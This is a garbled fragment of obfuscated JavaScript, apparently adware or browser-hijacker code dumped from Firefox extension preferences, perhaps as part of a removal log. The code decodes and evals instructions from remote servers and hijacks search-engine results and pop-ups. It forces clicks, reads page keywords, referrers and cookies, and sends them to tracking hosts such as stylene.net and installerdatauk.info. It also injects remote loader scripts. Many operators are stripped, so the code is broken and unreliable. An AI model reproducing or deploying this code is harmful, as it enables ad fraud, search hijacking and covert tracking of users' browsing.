1:a.src=c[0]+(-1'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0d)c+=String.fromCharCode(d),b++;else if(191d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com ad.z5x.net exchange.admailtiser.com evzc.wdfbj.com ads3.mediashakers.com ad.yieldmanager.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com ads.ad-maven.com advs.adgorithms.com ad.adnetwork.net gzas.synynyqj.com ads.incmd03.com cdn.adk2.com ads.mediawhite.com Servedby.bigfineads.com ads.incmd05.com a.ad-sys.com afx.tagcdn.com ads.geverads.netdna-cdn.com s3-us-west-2.amazonaws.com ads.mediasoul.net www.kbdadsfast.com adsrv.intelliad.com tala.intlsources.com an.z5x.net c5.zedo.com ty.bizwz.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info tr.adsplats.com ads.sonobi.com ifh.wdfbj.com cher.ehomestudy.com fw.adsafeprotected.com ad.improvemedianetwork.com track.btmobm.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=287609\")==-1 && adzy653rk.location.indexOf(\"zoneid=458516\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"0v3Jm4DU=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://stylene.net/z/?f=pjkKqdUKrjUFvTwEqV1Fqdw9qHaErHg4&eid=732&hid=5392771597948072366&pid=20014&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=pjkKqdUKrjUFvTwEqV1Fqdw9qHaErHg4&eid=732&hid=5392771597948072366&pid=20014&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"RandomPrice\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;eg.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f=e-d}};a.getInstructions=function(b, e) { a.msie ? a.inject_script(b + (\"&cb=\" + c.prefix + \".\" + e)) : a.ajax.get(b, function (b) { if (b)c[e](b) }) }; a.l = new function () { var b = this; b.xlat = \"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\"; b.encode = function (a) { a = b._utf8_encode(a); for (var c = \"\", d = 0; d < a.length;) { var f = a.charCodeAt(d++), h = a.charCodeAt(d++), l = a.charCodeAt(d++), k = f >> 2, f = (f & 3) << 4 | h >> 4, n = (h & 15) << 2 | l >> 6, m = l & 63; isNaN(h) ? n = m = 64 : isNaN(l) && (m = 64); c = c + b.xlat.charAt(k) + b.xlat.charAt(f) + (64 == n ? \"=\" : b.xlat.charAt(n)) + (64 == m ? \"=\" : b.xlat.charAt(m))}return c}; b._utf8_encode=function(b){if(b&&b.length){for(var a=\"\",c=0;cf?a+=String.fromCharCode(f):(127f?a+=String.fromCharCode(f>>6|192):(a+=String.fromCharCode(f>>12|224),a+=String.fromCharCode(f>>6&63|128)),a+=String.fromCharCode(f&63|128))}return a}return b};b.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var a=\"\",c=0;c>2,m=(l&3)<<6|k,a=a+String.fromCharCode(f<<2|h>>4);64!=l&&0f)a+=String.fromCharCode(f),c++;else if(191f)var h=b.charCodeAt(c+1),a=a+String.fromCharCode((f&31)<<6|h&63),c=c+2;else var h=b.charCodeAt(c+1),l=b.charCodeAt(c+2),a=a+String.fromCharCode((f&15)<<12| (h & 63) << 6 | l&63),c=c+3}return a}};a.ajax=new function(){this.get=function(b,a){try{var c=new XMLHttpRequest;c.open(\"GET\",b,!0);c.withCredentials=!0;c.onreadystatechange=function(){4==c.readyState&&a(c.responseText)};c.send()}catch(d){}}};a.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random()));return b};a.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b= parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();a.inject_script=function(b){var a=document.getElementsByTagName(\"body\")[0],g=document.createElement(\"script\");g.type=\"text/javascript\";g.id=\"id_\"+c.prefix;g.src=b;a&&a.appendChild(g)};a.epoch=function(){return Math.floor((new Date).getTime()/1E3)};a.getVert=function(){var b=localStorage.getItem(\"sk398erjds2d\");return b?b:a.forexVert()};a.browser=function(){var b=navigator.userAgent.toLowerCase(), a = {webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b),firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};a.version=a.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return a}();a.getNodeTextProp=function(b){return\"textContent\"in b?\"textContent\":\"innerText\"in b?\"innerText\":!1};a.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g, function(b,a,c){return c.toUpperCase()})};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(c){\"float\"==c&&(c=\"styleFloat\");c=a.dhtml_prop_name(c);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[c]?b.currentStyle[c]:null}}}:function(b,a){return window.getComputedStyle(b,a)||{getPropertyValue:function(){}}}};c.prefix=\"if72ru4sdfsdfruh7fewui\";c.extName=\"RandomPrice\";c.version=\"0.1.1\"; c.pop_collision_id=\"__ipu=\";c.pixel_token=\"px.pluginh\";c.pixel_data_token=\"__pdt\";c.pixelHostname=\"http://direct_pop.installerdatauk.info/\";c.fallbackHostnames=[\"sitewebred.info\",\"securespy.net\"];var q;q=\"\"!==c.stngs&&c.stngs&&\"undefined\"!==typeof c.stngs.szy_domain&&c.stngs.szy_domain instanceof Array?c.stngs.szy_domain:c.fallbackHostnames;c.hostnames=q;c.serverHostnames=[\"superiends.org\",\"go.turboloves.net\"];c.manhattanHostname=[\"sitewebred.com\",\"gadgetproffi.com\"];c.body=document.getElementsByTagName(\"body\")[0]; c.directParams={subid:\"20014\",subid1:\"5392771597948072366\",subid2:\"732\",direct:\"1\",tid:\"3\"};c.adTypes={_1:{key:\"728x90\"},_2:{key:\"300x250\"},_3:{key:\"468x60\"},_4:{key:\"250x250\"},_5:{key:\"160x600\"},_6:{key:\"120x600\"},_7:{key:\"120x240\"},_8:{key:\"240x400\"},_10:{key:\"300x600\"},_9:{key:\"1024x728\"},_11:{key:\"670x670\"},_12:{key:\"600x270\"},_13:{key:\"600x400\"}};c.dom=new function(){this.json_to_html=function(a,b){if(\"#text\"==a.type)b=document.createTextNode(a.text);else if(\"#comment\"!= a.type){b||(b=document.createElement(a.type));if(a.attrs){for(var e in a.attrs)if(a.attrs.hasOwnProperty(e))if(\"style\"==e&&a.attrs.style instanceof Object)for(var g in a.attrs.style){var d=c.utils.dhtml_prop_name(g);try{b.style[d]=a.attrs.style[g]}catch(f){}}else b.setAttribute(e,a.attrs[e]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(b.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(b.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&& (b.marginHeight=a.attrs.marginheight))}if(a.children)for(e=0;ewindow.close();\\x3c/script>\";document.getElementsByTagName(\"body\")[0].appendChild(g);var h=document.createEvent(\"MouseEvents\"); h.initMouseEvent(\"click\",!0,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);g.dispatchEvent(h);g.parentNode.removeChild(g)}p.msie&&(f.opener.window.focus(),window.self.window.focus(),window.focus())}catch(k){}};document.addEventListener?document.addEventListener(\"click\",m,!1):document.attachEvent(\"onclick\",m)})(b,l,k,n,m,e)})(b)})(b[0][0])};a.code_5=function(a){var e=a[0][0],g=function(){window.removeEventListener?document.removeEventListener(\"click\",g,!1):document.detachEvent(\"onclick\",g);c.pixel(\"0\",\"1\"); var a = document.createElement(\"a\");a.href=e;document.getElementsByTagName(\"body\")[0].appendChild(a);var b=document.createEvent(\"MouseEvents\");b.initMouseEvent(\"click\",!1,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);a.dispatchEvent(b);a.parentNode.removeChild(a);c.pixel(\"0\",\"1\")};document.addEventListener?document.addEventListener(\"click\",g,!1):document.attachEvent(\"onclick\",g)}};c.getKeywords=function(){var a=document.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,g=b.length;cf[h].length||(b[f[h]]?b[f[h]]++:b[f[h]]=1)}catch(l){}var d=[],k;for(k in b)d.push([k,b[k]]);d.sort(function(a,b){return b[1]-a[1]});d=d.slice(0,25);for(k=0;k\";b.setAttribute(\"style\",\"height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0\"); b.innerHTML=e;a.insertBefore(b,a.children[0])}};c.prepareUrl=function(){var a=\"?\",b;for(b in c.directParams)a+=b+\"=\"+c.directParams[b]+\"&\";a+=\"k=\"+encodeURIComponent(c.getKeywords());return\"//\"+c.hostnames[\"https:\"==window.self.location.protocol?1:0]+a};c.addParamsForPixel=function(){var a=c.pixelHostname+\"?\",b=c.hostnames[\"https:\"==window.self.location.protocol?0:1],b={pid:\"20014\",cc:\"PL\",eid:\"732\",hid:\"5392771597948072366\",v:c.version,ch:\"1\",cid:c.response[0][2], tid: c.directParams.tid,adtid:c.response[0][4],smid:c.response[0][3],pbid:\"0\",oh:encodeURIComponent(c.response[0][0]),sh:encodeURIComponent(b)},e;for(e in b)a+=e+\"=\"+b[e]+\"&\";a=a.slice(0,-1);a=c.utils.l.encode(a);return a.replace(/=/g,\"\")};c.falsePixel=function(){var a=c.pixelHostname+\"?\",b={pid:\"20014\",cc:\"PL\",eid:\"732\",hid:\"5392771597948072366\",v:c.version,ch:\"-1\",cid:\"0\",tid:\"0\",adtid:\"0\",smid:\"0\",pbid:\"0\",oh:\"0\",sh:encodeURIComponent(c.hostnames[\"https:\"== window.self.location.protocol?0:1])},e;for(e in b)a+=e+\"=\"+b[e]+\"&\";a=a.slice(0,-1);(new Image).src=a};c.tp=function(a){if(a){a=c.utils.l.decode(a);try{c.response=eval(a)}catch(b){}if(!c.response||!c.response[0])return c.falsePixel();c.response[0][0]=c.response[0][0].replace(\"zig_pp\",\"pjkKqdUKrjUFvTwEqV1Fqdw9qHaErHg4\");a=c.response[0][3];if(1!==a&&2!==a)if(0===a&&(a=3),\"function\"==typeof c.products[\"code_\"+a])c.products[\"code_\"+a](c.response);else c.products.code_3(c.response)}};c.getInstructions=function(a){var b= \"&cb=\" +c.prefix+\".tp\";c.utils.msie?c.utils.inject_script(a+b):c.utils.ajax.get(a,function(a){a&&c.tp(a)})};c.initPop=function(){if(-1!==window.location.href.indexOf(c.pop_collision_id))return c.injectComplianceBanner();var a=c.prepareUrl();c.utils.getInstructions(a,\"tp\")};c.checkIfPop=function(){return window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&-1==window.self.location.hostname.indexOf(\"earchfu\")&&(!document.referrer|| -1 == document.referrer.indexOf(\"/amz/\")&&!document.referrer.match(/cpops-\\d+\\.html/)&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf(\"/amz/\")&&!window.self.location.href.match(/cpops-\\d+\\.html/)&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length&&\"https:\"!==location.protocol};c.checkIfServer= function(){for(var a=0;a>2,f=(f&3)<<4|a>>4,l=(a&15)<< 2 | c>>6,h=c&63;isNaN(a)?l=h=64:isNaN(c)&&(h=64);d=d+b.xlat.charAt(n)+b.xlat.charAt(f)+(64==l?\"=\":b.xlat.charAt(l))+(64==h?\"=\":b.xlat.charAt(h))}return d};b._utf8_encode=function(e){if(e&&e.length){for(var d=\"\",b=0;ba?d+=String.fromCharCode(a):(127a?d+=String.fromCharCode(a>>6|192):(d+=String.fromCharCode(a>>12|224),d+=String.fromCharCode(a>>6&63|128)),d+=String.fromCharCode(a&63|128))}return d}return e};b.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g, \"\");for(var d=\"\",b=0;b>2,h=(g&3)<<6|n,d=d+String.fromCharCode(c<<2|k>>4);64!=g&&0f)b+=String.fromCharCode(f),c++;else if(191f)var k=a.charCodeAt(c+ 1),b=b+String.fromCharCode((f&31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|g&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split(\"__pdt\");b.length&&(b=a.l.decode(b[1]));return function(a){var b= {};a.replace(/([^?=&]+)(=([^&]*))?/g,function(a,c,e,g){b[c]=decodeURIComponent(g)});return b}(b.replace(/^.*\\?/,\"\"))};a.getHostname=function(a){var c=document.createElement(\"a\");c.href=a;return c.hostname}},function(){var a=document.createElement(\"div\");a.id=\"__hggasdgjhsagd_once\";a.setAttribute(\"style\",\"display:none;\");var b=document.getElementsByTagName(\"body\")[0];b&&b.appendChild(a)}(),c.pixel=function(){var a=c.Utils.getParams();if(a&&a.cid){var b=c.pixelHostname+\"?\",e=a.sh||\"\",d=a.cid||\"\",m= a.tid||\"\",f=a.adtid||\"\",k=a.pid||\"\",g=a.cc||\"\",n=a.eid||\"\",l=a.hid||\"\",h=a.version?a.version:\"1\",a=a.tid||\"\",q=c.Utils.getHostname(location.href),e={pid:k,cc:g,eid:n,hid:l,v:h,ch:\"0\",cid:d,tid:a,adtid:m,smid:f,pbid:\"0\",oh:encodeURIComponent(q),sh:encodeURIComponent(e)},p;for(p in e)b+=p+\"=\"+e[p]+\"&\";b=b.slice(0,-1);(new Image).src=b}},-1c.Utils.msie||\"undefined\"==typeof window[c.prefix]&&(window[c.prefix]= c))};})();"); FF - prefs.js..extensions.sk6FHeQ0dmgmiJTw.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1){return}}catch(e){};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"SWYAe7o9=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=287609&ext=GoSave&systemid=5392771597948072366&ext=GoSave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1542/l.js?aoi=1311798366&pid=1542&zoneid=287609&ext=GoSave&systemid=5392771597948072366&ext=GoSave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var 